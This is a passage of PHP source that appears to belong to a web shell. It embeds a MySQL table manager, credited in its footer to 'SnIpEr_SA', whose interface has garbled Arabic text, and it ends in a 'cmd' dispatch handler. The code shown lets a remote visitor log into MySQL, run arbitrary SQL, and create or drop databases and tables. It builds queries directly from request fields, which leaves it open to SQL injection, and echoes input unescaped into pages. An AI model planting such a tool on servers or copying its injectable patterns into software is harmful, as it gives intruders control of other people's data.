 854         // Start of new code for set drop down
 855       }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
 856        $num=substr_count($arr[1],',') + 1;  // count the number of entries
 857        $pos=strpos($arr[1],'(' ); //find the position of '('
 858        $newstring=substr($arr[1],$pos+1);  // get rid of the '???('
 859        $snewstring=str_replace(')','',$newstring); // get rid of the last ')'
 860        $nnewstring=explode(',',$snewstring,$num); // stick into an array
 861        if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
 862            echo "<td>Set (select one or more)</td>";
 863            echo"<td><select name='array[$i][]' size='3' multiple>";
 864        }else{//Enum one value only
 865         echo "<td>Enum</td>";
 866            echo"<td><select name='array[$i]'>";
 867        }
 868        for($y=0; $y<$num;$y++){
 869        echo"<option value=$nnewstring[$y]>$nnewstring[$y]";
 870        }
 871         echo"</select></td></tr>\n";
 872     // End of new code block for set drop down
 873       }else{
 874        echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' /></td></tr>\n";
 875       }
 876  }
 877  echo"<tr><td><input class=but type=submit name='addrec' value='Add Record' /></td>\n";
 878  echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
 879  echo"</tr>";
 880  echo"</table>\n";
 881  echo"</form>\n";
 882 }
 883 
 884 //*********************Edit Form ***************
 885 function editform($tablename, $dbname, $result, $edit, $pk, $pv){
 886         $row=mysql_fetch_array($result);
 887         echo"<form action='$action'  method=post>\n";
 888         echo"<table border=0 width ='100%' align='center'>\n";
 889         $flds = mysql_num_fields($result);
 890         $fields = mysql_list_fields($dbname, $tablename);
 891         echo"<input type=hidden name=tablename value='$tablename' />\n";
 892         echo"<input type=hidden name='dbname' value='$dbname' />\n";
 893         echo"<tr>";
 894         $mxlen = 80;//max width of the form fields
 895         for($i=0; $i < $flds; $i++){
 896         $fname=mysql_field_name($fields, $i);
 897                 echo "<th>$fname";
 898                  $flen = mysql_field_len($result, $i);//length of the field
 899                 $nslash = StripSlashes($row[$i]);
 900         // Start of new code for set drop down
 901       $newsql = "show columns from $tablename like '%".$fname."'";
 902       $newresult = exequery($newsql, $tablename, $dbname);
 903       $arr=mysql_fetch_array($newresult);
 904     // End of new code block for set drop down
 905                 if($flen > $mxlen){
 906                         $rws= $flen/$mxlen;
 907                                 if($rws>10){
 908                                 $rws=10; //max length of textarea
 909                         }
 910                         echo"<td><textarea name='array[$i]' rows=$rws cols=$mxlen>$nslash</textarea></td></tr>\n";
 911 // Start of new code for set drop down
 912           }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
 913            $num=substr_count($arr[1],',') + 1;  // count the number of entries
 914            $pos=strpos($arr[1],'(' ); //find the position of '('
 915            $newstring=substr($arr[1],$pos+1);  // get rid of the '???('
 916            $snewstring=str_replace(')','',$newstring); // get rid of the last ')'
 917            $nnewstring=explode(',',$snewstring,$num); // stick into an array
 918            if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
 919                echo"<td><select name='array[$i][]' multiple size='3'>";
 920            }else{//Enum one value only
 921                echo"<td><select name='array[$i]'>";
 922            }
 923            $nsel=explode(",",$nslash);
 924           for($y=0; $y<$num;$y++){
 925                 //geteach value 'a,b,c'
 926                 $sel="";
 927                 for($e=0; $e<count($nsel);$e++){
 928                     if($nnewstring[$y]=="'".$nsel[$e]."'"){
 929                         $sel="selected";
 930                     }
 931                 }
 932                 echo"<option value=$nnewstring[$y] $sel>$nnewstring[$y]";
 933            }
 934             echo"</select></td></tr>\n";
 935 // End of new code block for set drop down
 936 
 937         }else{
 938                         echo"<td><input type=text name='array[$i]' size='$flen' value='$nslash' /></td></tr>\n";
 939                 }
 940                 for($f =0; $f< count($pk);$f++){
 941                         echo"<input type=hidden name=pk[$f] value='$pk[$f]' />";
 942                         echo"<input type=hidden name=pv[$f] value='$pv[$f]' />\n";
 943                 }
 944         }
 945         echo"<tr><td><input class=but type=submit name='editrec' value='Update' /></td>\n";
 946         echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
 947         echo"</tr>";
 948         echo"</table>\n";
 949         echo"</form>\n";
 950 }
 951 //************************Edit Record*************************
 952 function editrec($dbname, $tablename, $pk, $pv, $array){
 953         //$result = @mysql_query( "Select * from $tablename" );
 954     $result = exequery("Select * from $tablename", $tablename, $dbname);
 955         $flds = mysql_num_fields($result);
 956         $fields = mysql_list_fields($dbname, $tablename);
 957 //Build Query
 958            $qry="";
 959     $query = "UPDATE $tablename set ";
 960         for ($x =0; $x < $flds; $x++){
 961                 $fie = mysql_field_name($fields, $x );
 962         // SET and ENUM
 963          if(is_array($array[$x])){
 964             $mval="";
 965             for($m=0; $m < count($array[$x]); $m++){
 966                 if($m+1 == count($array[$x])){
 967                     $mval.= AddSlashes($array[$x][$m]);
 968                 }else{
 969                     $mval.= AddSlashes($array[$x][$m]).",";
 970                 }
 971                 $fval = $mval;
 972             }
 973         }else{
 974                     $fval = AddSlashes($array[$x]);
 975         }
 976         //**************************
 977                 //$fval = AddSlashes($array[$x]);
 978                 $qry .= "$fie = '$fval'";
 979                 if ($x < $flds-1){
 980                         $qry.= ", ";
 981                 }
 982         }
 983         $whr = buildwhr( $pk, $pv);
 984         $whr =StripSlashes($whr);
 985         $query .= "$qry";
 986         $query .= " where $whr";
 987     $result=exequery($query, $tablename, $dbname);
 988         if($result){
 989                 return $result;
 990         }else{
 991                 return false;
 992         }
 993 }
 994 //****************** Number of Primary Keys ***********************
 995 function numpk($result){
 996         $z =0;
 997         for ($i = 0; $i < $flds; $i++) {
 998                 //Find the primary key
 999                 $flagstring = mysql_field_flags ($result, $i);
1000                 if(eregi("primary",$flagstring )){
1001                         $z++;
1002                 }
1003         }
1004         return $z;
1005 }
1006 //********************Size field*****************
1007 function fieldformsize($ft, $i, $l){
1008         $ft= trim(strtoupper($ft));
1009         if($ft =="DATE" || $ft=="TIME" || $ft== "DATETIME" ){
1010         }elseif( $ft=="TINYTEXT" || $ft=="BLOB" || $ft=="TEXT" || $ft =="MEDIUMBLOB"){
1011                 echo"<input type=hidden name='leng[$i]' value=$l>";
1012         }elseif($ft=="MEDIUMTEXT" || $ft=="LONGBLOB"|| $ft=="LONGTEXT" || $ft=="TINYBLOB"){
1013                 echo"<input type=hidden name='leng[$i]' value=$l>";
1014         }elseif($ft=="INT" || $ft=="TINYINT"|| $ft=="SMALLINT"|| $ft=="MEDIUMINT"|| $ft=="BIGINT" || $ft=="INTEGER"){
1015                 echo"<input type=text name='leng[$i]' size=5  value=$l>";
1016         }elseif($ft=="YEAR" ){
1017                 echo"<select name='leng[$i]'>";
1018                 echo"<option value='4'>4";
1019                 echo"<option value='2'>2";
1020                 echo"</select>\n";
1021     }elseif($ft=="SET"|| $ft=="ENUM"){
1022         echo"<input type=text name='leng[$i]' title='values eg \"a\", \"b\", \"c\"' value='' />";
1023         }else{
1024                 echo"<input type=text name='leng[$i]' size=5 value=$l />\n";
1025         }
1026 }
1027 //******************************Display Row ******************************
1028 function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){
1029         $pkfs="";
1030         $hv="";
1031         $hf="";
1032         if($cpk >0 && !empty($pkfield)){
1033                 for($a = 0; $a < $cpk; $a++){
1034                         $fieldn = $pkfield[$a];
1035                         $hf .= "<input type=hidden name=pk[$a] value='$pkfield[$a]' />";
1036                         $hv .= "<input type=hidden name=pv[$a] value='$row[$fieldn]' />";
1037                 }
1038         }else{ //No Primary Key so use all fields
1039                 $fields = mysql_list_fields($dbname, $tbl);
1040                 for($b = 0; $b < $flds; $b++){
1041                         $fie = mysql_field_name($fields, $b );
1042                         $hf .= "<input type=hidden name=pk[$b] value='$fie' />";
1043                         $hv .= "<input type=hidden name=pv[$b] value='$row[$b]' />";
1044                 }
1045         }
1046         echo"<tr>\n";
1047         //edit Record
1048         echo"<td><form action='$action' method=post>\n";
1049         echo"<input type=hidden name=dbname value='$dbname' />\n";
1050         echo"<input type=hidden name=tablename value='$tbl' />\n";
1051         echo"<input type=hidden name=npkeys value='$cpk' />\n";
1052         echo"$hf";
1053         echo"$hv";
1054         echo"<input class=sml type=submit name=edit value='Edit Record' />\n";
1055         echo"</form></td>\n";
1056         //Delete record
1057         echo"<td><form action='$action' method=post>\n";
1058         echo"<input type=hidden name=dbname value='$dbname' />\n";
1059         echo"<input type=hidden name=tablename value='$tbl' />\n";
1060         echo"<input type=hidden name=num value='$cpk' />\n";
1061         echo"$hf";
1062         echo"$hv";
1063         echo"<input class=smldel type=submit name=delete value='Delete Record' />\n";
1064         echo"</form></td>";
1065         //Display all the columns.
1066         for($col = 0; $col < $flds; $col ++){
1067                 $nslash = StripSlashes($row[$col]);
1068                 echo"<td>$nslash</td>";
1069         }
1070         echo"</tr>";
1071 }
1072 //***********************Remove Array Copy********************************
1073 //removes copies from an array $x.
1074 function removearraycopy($x){
1075         $leng= count($x);
1076         sort($x);
1077         $farr=array();
1078         for ($i =0; $i < $leng; $i++){
1079                 $flag=false;
1080                 for ($s =0; $s < count($farr); $s++){
1081                         if($x[$i]==$farr[$s]){
1082                                 $flag=true;
1083                         }
1084                 }
1085                 if ($flag == false){
1086                         $farr[count($farr)] = $x[$i];
1087                 }
1088         }
1089         return $farr;
1090 }
1091 //***********************<< page position >>********************************
1092 function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){
1093         $pgs = $num_rows/$pagemax;
1094         $pgs=ceil($pgs);
1095                             //round up the number of pages.
1096         echo"<form action='$action' id='recspage' method='post' name='recspage'>\n";
1097     echo"Total number of records $num_rows, displayed on $pgs pages of \n";
1098     echo"<input type='text'  name='pagemax' value='$pagemax' size='4' onchange='javascript:this.form.submit();' title='Type the number records to display on a page then click outside the box' /> \n";
1099         echo"<input type='hidden' name='searchval' value='$searchval'  />\n";
1100     echo"<input type='hidden' name='tablename' value='$tablename'  />\n";
1101     echo"records per page.</form> \n";
1102     $pagescrol="";
1103     $sval="";
1104           if($pgs >1){
1105             $pagescrol="<div class='pagecount'>\n";
1106                         $nxt=$pg+1;
1107             $bk=$pg-1;
1108             $lst=$pgs;
1109             $end=$lst-1;
1110             $showp=$pg+1;
1111            if($searchval !=""){
1112             $sval="&amp;searchval=$searchval";
1113            }
1114            $pagescrol .= "<form name='pages' id='pages' action='$action' method='get'>\n";
1115             if($pg>=1){
1116                 $pagescrol .= " <a href='$action?tablename=$tablename&amp;pg=0$sval' title='To first page'> 1 :<< </a> \n";
1117                                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$bk$sval' title='Back one page'> < </a> \n";
1118                         }
1119            $pagescrol .= "<input type='text' name='pg' value='$showp' size='4' onchange='javascript:this.form.submit();' title='Type a page number then click outside the box' />\n";
1120            $pagescrol .= "<input type='hidden' name='pback' value='true'  />\n";
1121            $pagescrol .= "<input type='hidden' name='searchval' value='$searchval'  />\n";
1122            $pagescrol .= "<input type='hidden' name='tablename' value='$tablename'  />\n";
1123            if($showp < $lst){
1124                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$nxt$sval' title='Next page'> > </a> \n";
1125                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$end$sval' title='To Last page'> >>: $lst</a> \n";
1126            }
1127            $pagescrol .= "</form>\n";
1128            $pagescrol.="</div>\n";
1129       }
1130         return $pagescrol;
1131 }
1132 //*************Display Footer*************************
1133 //Please don't remove or change.
1134 function display_foot(){
1135     echo"<div class='foot'>Version $version &copy; ".date('Y')." <a style='text-decoration:none;' target='_blank' href='http://www.SnIpEr-SA.com'>SnIpEr_SA</a></div>";
1136     }
1137 //*************My Size*************************
1138 //Returns the size of a table or database
1139 function mysize($dbname, $tablename){
1140     $like="";
1141     $total="";
1142     $t=0;
1143     if($tablename !=""){
1144         $like=" like '$tablename'";
1145     }
1146     $sql= "SHOW TABLE STATUS FROM $dbname $like";
1147     //$result = mysql_query($sql);
1148     $result=exequery($sql, $tablename, $dbname);
1149     if($result){
1150         while($rec = mysql_fetch_array($result)){
1151          $t+=($rec['Data_length'] + $rec['Index_length']);
1152          }
1153         $total ="<span class='bytes'>$t bytes</span>";
1154     }else{
1155         $total="Unknowen";
1156     }
1157     return($total);
1158 }
1159 
1160 //**************************************
1161 //DEBUG to show all being passed to the page
1162 function showpassingvars(){
1163         echo"Get: ";
1164          foreach($_GET as $pram=>$value){
1165                  echo"$pram: $value, ";
1166          }
1167         echo"<br>Post: ";
1168          foreach($_POST as $pram=>$value){
1169                   echo"$pram: $value, ";
1170          }
1171          echo"<br>Session: ";
1172          foreach($_SESSION as $pram=>$value){
1173                  echo"$pram: $value, ";
1174          }
1175  }
1176 echo"<html>\n";
1177 echo"<meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>\n";
1178 echo"<head>\n";
1179 echo"<title>????? ??????? ?????? ????????</title>\n";
1180 echo"<STYLE>
1181 BODY
1182  {
1183         SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
1184 }
1185 tr {
1186 BORDER-RIGHT:  #cccccc ;
1187 BORDER-TOP:    #cccccc ;
1188 BORDER-LEFT:   #cccccc ;
1189 BORDER-BOTTOM: #cccccc ;
1190 color: #ffffff;
1191 }
1192 td {
1193 BORDER-RIGHT:  #cccccc ;
1194 BORDER-TOP:    #cccccc ;
1195 BORDER-LEFT:   #cccccc ;
1196 BORDER-BOTTOM: #cccccc ;
1197 color: #cccccc;
1198 }
1199 .table1 {
1200 BORDER: 1;
1201 BACKGROUND-COLOR: #000000;
1202 color: #333333;
1203 }
1204 .td1 {
1205 BORDER: 1;
1206 font: 7pt tahoma;
1207 color: #ffffff;
1208 }
1209 .tr1 {
1210 BORDER: 1;
1211 color: #cccccc;
1212 }
1213 table {
1214 BORDER:  #eeeeee  outset;
1215 BACKGROUND-COLOR: #000000;
1216 color: #cccccc;
1217 }
1218 input {
1219 BORDER-RIGHT:  #990000 1 solid;
1220 BORDER-TOP:    #990000 1 solid;
1221 BORDER-LEFT:   #990000 1 solid;
1222 BORDER-BOTTOM: #990000 1 solid;
1223 BACKGROUND-COLOR: #333333;
1224 font: 9pt tahoma;
1225 color: #ffffff;
1226 }
1227 select {
1228 BORDER-RIGHT:  #ffffff 1 solid;
1229 BORDER-TOP:    #999999 1 solid;
1230 BORDER-LEFT:   #999999 1 solid;
1231 BORDER-BOTTOM: #ffffff 1 solid;
1232 BACKGROUND-COLOR: #000000;
1233 font: 9pt tahoma;
1234 color: #CCCCCC;;
1235 }
1236 submit {
1237 BORDER:  buttonhighlight 1 outset;
1238 BACKGROUND-COLOR: #272727;
1239 width: 40%;
1240 color: #cccccc;
1241 }
1242 textarea {
1243 BORDER-RIGHT:  #ffffff 1 solid;
1244 BORDER-TOP:    #999999 1 solid;
1245 BORDER-LEFT:   #999999 1 solid;
1246 BORDER-BOTTOM: #ffffff 1 solid;
1247 BACKGROUND-COLOR: #333333;
1248 font: Fixedsys bold;
1249 color: #ffffff;
1250 }
1251 BODY {
1252 margin: 1;
1253 color: #cccccc;
1254 background-color: #000000;
1255 }
1256 A:link {COLOR:red; TEXT-DECORATION: none}
1257 A:visited { COLOR:red; TEXT-DECORATION: none}
1258 A:active {COLOR:red; TEXT-DECORATION: none}
1259 A:hover {color:blue;TEXT-DECORATION: none}
1260 </STYLE>\n";
1261 echo"<meta http-equiv='Content-Type' content='text/html charset=windows-1256'>";
1262 echo"<title>????? ??????? ?????? ????????</title>\n";
1263 echo"<meta name='author' content='Tony Aslett'>";
1264 echo"<meta name='title' content='PHP:MySQL Table Manager'>";
1265 echo"<meta name='description' content='Table Manager for MySQL Database'>";
1266 echo"<link rel='stylesheet' href='tmgrstyles.css' type='text/css'>\n";
1267 echo"</head>\n";
1268 echo"<body>\n";
1269 $showall=true;
1270 echo"<h2 class=h >????? ??????? ?????? ????????</h2>\n";
1271 //******************* Session Logon ***********************
1272 if(isset($_POST['logout'])){
1273                 $_POST['dbname']="";
1274                 session_unset();
1275                 session_destroy();
1276 }
1277 if(isset($_POST['userid']) && isset($_POST['pword1'])){
1278         $_SESSION['user'] = $_POST['userid'];
1279         $_SESSION['password'] = $_POST['pword1'];
1280 }
1281 if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){
1282         echo"<div align=center>";
1283         echo"<h2>???? ?????? ??????? ???????</h2>\n";
1284         If(!isset($dbnamearray)){
1285                 $dbnamearray="";
1286         }
1287         show_login($dbnamearray);
1288         echo"</div>";
1289 }else{
1290         //show logout option.
1291         echo"<div align=right>";
1292         endsess();
1293         echo"</div>";
1294 }
1295 //*****dbname
1296 if(isset($_POST['dbname'])){
1297         $dbname=$_POST['dbname'];
1298     $_SESSION['dbname']= $_POST['dbname'];
1299 }
1300 //***** Host
1301 if(isset($_POST['host'])){
1302     $host=$_POST['host'];
1303     $_SESSION['host']=$_POST['host'];
1304 }
1305 //******set tablename
1306 if(isset($_GET['tablename']) ){
1307         $tablename=$_GET['tablename'];
1308 }elseif(isset($_POST['tablename'])){
1309         $tablename=$_POST['tablename'];
1310 }
1311 //********** pagemax
1312 if(isset($_POST['pagemax'])){ //&& is_int($_POST['pagemax'])){
1313     $isnum=true;
1314     for($o=0; $o<count($_POST['pagemax']); $o++){
1315             if($_POST['pagemax'][$o]>9){
1316                 $isnum=false;
1317             }
1318     }
1319     if($_POST['pagemax']>0 && $isnum){
1320         $_SESSION['pagemax']=$_POST['pagemax'];
1321     }
1322 }
1323  if(isset($_SESSION['pagemax'])){
1324     $pagemax=$_SESSION['pagemax'];
1325  }
1326 //******** create a new Database ************
1327 if(isset($_POST['cndb'])){
1328     connectmysql();
1329         $sql="create database $_POST[ndbname]";
1330         $result=exequery($sql, " ", $_POST['ndbname']);
1331         if ($result){
1332                 $_SESSION['dbname'] = $_POST['ndbname'];
1333         $sql="Use $_POST[ndbname]";
1334             $result=exequery($sql, " ", $_POST['ndbname']);
1335         if($result){
1336             echo"<h2>????? ????? $_SESSION[dbname] </h2>\n";
1337         }
1338         }
1339 }
1340 //*********************************************
1341 if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post
1342         //Databse names
1343         showdb();
1344 }
1345 //************************ Choose DB *************
1346 if(isset($_POST['dbname']) && $_POST['dbname']==""){
1347     showdb();
1348 }
1349 //**********
1350 if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){
1351 //*************************************
1352                 //connection
1353                 if (isset($_SESSION['dbname'])){
1354                         $dbsetname = $_SESSION['dbname'];
1355                 }elseif(isset($_POST['dbname'])){
1356                         $dbsetname = $_POST['dbname'];
1357                         $_SESSION['dbname'] = $_POST['dbname'];
1358                 }else{
1359                         $dbsetname = $_POST['dbna'];
1360                         $_SESSION['dbname'] = $_POST['dbna'];
1361                 }
1362 }
1363 //*************************** we have a DB set
1364 if(isset($dbsetname) && $dbsetname!=""){
1365                     $link= connectmysql();
1366             //echo"DBS: $dbsetname";
1367                     $conn = connectdb($dbsetname, $link);
1368 //*********** Drop Table **************
1369         if(isset($_POST['deltable'])){
1370         $showall=false;
1371                 $tablename=$_POST['tablename'];
1372                 echo"<h1>!!! ????? !!! <br>??? ????? ??? ??? ?????? $tablename<br>";
1373                 echo"?? ??? ????? ?? ?????? ??????????</h1>\n";
1374                 $va="Drop $tablename";
1375                 goto($tablename, $dbname,$action, 'del', 'droptab', $va );
1376         }
1377         if(isset($_POST['droptab'])){
1378                 $tablename=$_POST['tablename'];
1379                 $dsql = "drop table $tablename";
1380                 $result=exequery($dsql, $tablename, $dbname);
1381                 unset($tablename); //="false";
1382                 unset($_POST['tablename']);
1383         }
1384 //*****************Write Your Own Query *****************
1385         if(isset($_POST['wyoq'])){  //post
1386                 $value="??????? ???????? ???????";
1387                 goto($tablename, $dbname, $action, 'but', 'start', $value );
1388                 echo"<form method='post'>\n";
1389                 echo"<input type='hidden' name='dbname' value=$dbname>\n";
1390                 //echo"<input type=text name='wyqota' width='500px' style='overflow-x:visible;'>\n";
1391                 echo"<textarea name='wyoqta' cols='60' rows='5' style='overflow-y:visible'></textarea>\n";
1392                 echo"<br><input class=but type=submit name='runquery' value='Execute Query'>\n";
1393                 echo"</form><br>\n";
1394         }
1395         if(isset($_POST['runquery'])){
1396                 $wyoqta = StripSlashes($_POST['wyoqta']);
1397                 $result=exequery($wyoqta, " ", " ");
1398                 if(@mysql_num_rows($result) >0){
1399                          $numrows=mysql_num_rows($result);
1400                         $flds=mysql_num_fields($result);
1401                         echo"<table>";
1402                         for($r=0; $r < $numrows; $r++){
1403                                 echo"<tr>";
1404                                 $row=mysql_fetch_array($result);
1405                                 for($col = 0; $col < $flds; $col ++){
1406                                         $nslash = StripSlashes($row[$col]);
1407                                         echo"<td>$nslash</td>";
1408                                 }
1409                                 echo"</tr>";
1410                         }
1411                         echo"</table>";
1412                 }elseif (mysql_affected_rows()){
1413                         echo" Number of Rows affected: ".mysql_affected_rows();
1414                 }else{
1415                         echo" Nothing returned from the query.";
1416                 }
1417         }
1418 // ****************List Tables***************************
1419         if( ! isset($tablename) || $tablename==" " ){
1420                 $dbname=$_SESSION['dbname'];
1421                 $result = mysql_list_tables($_SESSION['dbname']);
1422                  $numtab = mysql_num_rows ($result);
1423                  if($numtab == 1){
1424                         $_SESSION['tablename'] =mysql_tablename($result, 0);
1425                  }
1426 //***************** Buttons ******************************
1427                 if (isset($_POST['runquery'])){
1428                         $dbname=$_SESSION['dbname'];
1429                         $value="$dbname Start"; //Table Manager Start
1430                         goto("", $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
1431                 }elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ //write your own query.
1432                         echo"<table width=40% border=0 align='left' >\n";
1433                         echo"<tr><td>";
1434                         $va="????? ???? ????";
1435                         goto("", $_SESSION['dbname'], "create.php", 'but', 'create', $va );
1436           //  echo"<a href=create.php class='crt'>Create new Table</a>\n";
1437                         echo"</td><td>";
1438         $value="??????? ????????"; //Choose DB
1439                 goto("", "", $action, 'but', 'db', $value );
1440                 echo"</td>\n";
1441                         $value="Write Your Own Query";
1442                         goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
1443                         echo"</td></tr>";
1444                         echo"</table><br><br><br><br><div style='clear:both;'></div>";
1445                         echo"<table width=100% border=0 align='center' >\n";
1446                         for ($i =0; $i < $numtab; $i++) {
1447                                 $tb_names[$i] = mysql_tablename($result, $i);
1448                                 echo"<tr class='frow'><td align='center'>\n";
1449                                 $va="??? ???? * $tb_names[$i]";
1450                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va );
1451                                 echo"</td><td  align='center' valign='middle'>\n";
1452                                 $va="??? ???? $tb_names[$i]";
1453                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va );
1454                                 echo"</td><td  align='center' valign='middle'>\n";
1455                                 $va="Alter Table $tb_names[$i]";
1456                                 goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
1457                                 echo"</td><td align='center' valign='middle'>\n";
1458                                 searchtableform($tb_names[$i], $_SESSION['dbname']);
1459                                 echo"</td><td>";
1460                 //Table size in bytes
1461                echo mysize($_SESSION['dbname'],$tb_names[$i]);
1462                 echo"</td></tr>\n";
1463                         }//for
1464                         echo"</table>\n";
1465                 }
1466         }else{ //tablename is set
1467 //***************** menu *****************************************
1468                 echo"<table><tr class='frow'><td>\n";
1469                 $value="$_SESSION[dbname] Start"; //Ex Table Manager Start
1470                 goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
1471                 echo"</td>\n";
1472         echo"<td>\n";
1473         $value="??????? ????????"; //Choose DB
1474                 goto("", "", $action, 'but', 'start', $value );
1475                 echo"</td>\n";
1476         echo"<td>\n";
1477         $value="Write Your Own Query";
1478                 goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
1479         echo"</td>\n";
1480                 if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){
1481                         echo"<td>";
1482                         //$tablename = $_POST['tablename'];
1483                         $va="Add a $tablename Record";
1484                         goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va );
1485                         echo"</td>\n";
1486                 }
1487                 if (!isset($_POST['deltable'])){
1488                         echo"<td>\n";
1489                         searchtableform($tablename, $_SESSION['dbname']);
1490                         echo"</td>\n";
1491                 }
1492                 echo"</tr></table>\n";
1493                 echo"<br />\n";
1494 //**************************************************
1495                 if(isset($_POST['addrec'])){
1496            // $showall=false;
1497                         $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']);
1498                 }elseif(isset($_POST['add'])){
1499             $showall=false;
1500                         addform($tablename, $_SESSION['dbname']);
1501                 }elseif(isset($_POST['delete'])){
1502                         //delete record has been pushed
1503            // $showall=false;
1504                         $whr=buildwhr($_POST['pk'], $_POST['pv']);
1505                         $sql = "delete from $tablename where $whr";
1506                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
1507                 }elseif (isset($_POST['edit'])){//Edit
1508             $showall=false;
1509                         $whr = buildwhr( $_POST['pk'], $_POST['pv']);
1510                         //$tablename = $_SESSION['tablename'];
1511                         $sql= "Select * from $tablename where $whr";
1512                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
1513                         editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']);
1514                 }elseif(isset($_POST['editrec'])){
1515            // $showall=false;
1516                         $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']);
1517                 }
1518 //**************** Search ************************************
1519                 if(isset($_POST['searchval'])){
1520                         $searchval=$_POST['searchval'];
1521                 }elseif(isset($_GET['searchval'])){
1522                         $searchval=$_GET['searchval'];
1523                 }else{
1524                         $searchval="";
1525                 }
1526                 if (isset($_GET['tablename'])){
1527                         $tablename = $_GET['tablename'];
1528                 }
1529                 if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){
1530                         $result=searcht($tablename, $_SESSION['dbname'],  $searchval);
1531                 }else{
1532                         //Display All
1533                         $query = "select * from $tablename";
1534                         $result=exequery($query, $tablename, $_SESSION['dbname']);
1535                 }
1536 //***************** Display record count *****************************************
1537         if($showall){
1538             $num_rows = mysql_num_rows($result);
1539             //Workout whick page to display
1540                     if(!isset($_GET['pg']) && !isset($pg)){
1541                             $beg=0;
1542                 $pg=0;
1543                     }else{
1544                 if(isset($_GET['pback'])){
1545                     $pg=$_GET['pg'];
1546                 }else{
1547                     $pg=$_GET['pg'];
1548                 }
1549                  if($pg < 0 ){
1550                     $pg=0;
1551                 }
1552                 if($pg > $num_rows/$pagemax){
1553                     $pg=ceil($num_rows/$pagemax)-1;
1554                 }
1555                 $beg = $pg * $pagemax;
1556                     }
1557                     if (!isset($_POST['add'])){
1558                             $pscrol=" ";
1559                             $pagescrol =" ";
1560                             $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval);
1561                             echo "$pagescrol\n"; //Display next Top page menu
1562                             $flds = mysql_num_fields($result);
1563                             echo"<table border=0 width='100%'>\n";
1564                             echo"<tr class=head><td></td><td></td>\n";
1565                             $fields = mysql_list_fields( $_SESSION['dbname'], $tablename);
1566                             $z=0;
1567                             $x =0;
1568                             $pkfield=array();
1569 //*************Display each of the field names.***************************
1570                             for ($i = 0; $i < $flds; $i++) {
1571                                         echo "<td>".mysql_field_name($fields, $i)."</td>\n";
1572                                     //Find the primary key
1573                                     $flagstring = mysql_field_flags ($result, $i);
1574                                     if(eregi("primary",$flagstring )){
1575                                             $pk[$z] = $i;
1576                                             $pkfield[$z]= mysql_field_name($fields, $i);
1577                                             $z++;
1578                                     }
1579                             }
1580                             echo"</tr>\n";
1581                             $tbl=$tablename;
1582                             //if(isset($pk)){
1583                             if($z > 0){
1584                                     $cpk=count($pk);
1585                             }else{
1586                                     $cpk=0;
1587                             }
1588 //************Display each row from the table.********************************
1589                             for ($s=$beg; $s < $beg + $pagemax; $s++){
1590                                     if($s < $num_rows){
1591                                             if (!mysql_data_seek ($result, $s)) {
1592                                         echo "Cannot seek to row $s\n";
1593                                         continue;
1594                                     }
1595                                             $row=mysql_fetch_array($result);
1596                                             if(!isset($pk)){
1597                                                     $pk=" ";
1598                                                     $pkfield= array();
1599                                             }
1600                                             displayrow($_SESSION['dbname'], $tbl, $pk, $pkfield, $cpk, $row, $flds);
1601                                     }
1602                             }
1603                     }
1604                     echo"</table>\n";
1605                     if (!isset($_POST['add']) && !isset($_POST['edit']) && !isset($_POST['deltable']) && !isset($_POST['droptab']) && !isset($_POST['wyoq']) && $tablename){
1606                             echo"<br>";
1607                             echo "$pagescrol\n"; //Display bottom next page menu
1608                     }
1609                     echo"<br><br>\n";
1610                  }//showall
1611                  if(isset($_POST['tablename'])){
1612                          echo"<table border=0>";
1613                      echo"<tr><td>";
1614                          $tablename=$_POST['tablename'];
1615                          $va="Alter Table $tablename";
1616                          goto( $tablename,  $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
1617                          echo"</td></tr>\n";
1618                          echo"</table>\n";
1619                 }
1620         }
1621 }
1622 display_foot();
1623 echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";  die(); }
1624 if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
1625  {
1626  echo $head;
1627  $sql = new my_sql();
1628  $sql->db   = $_POST['db'];
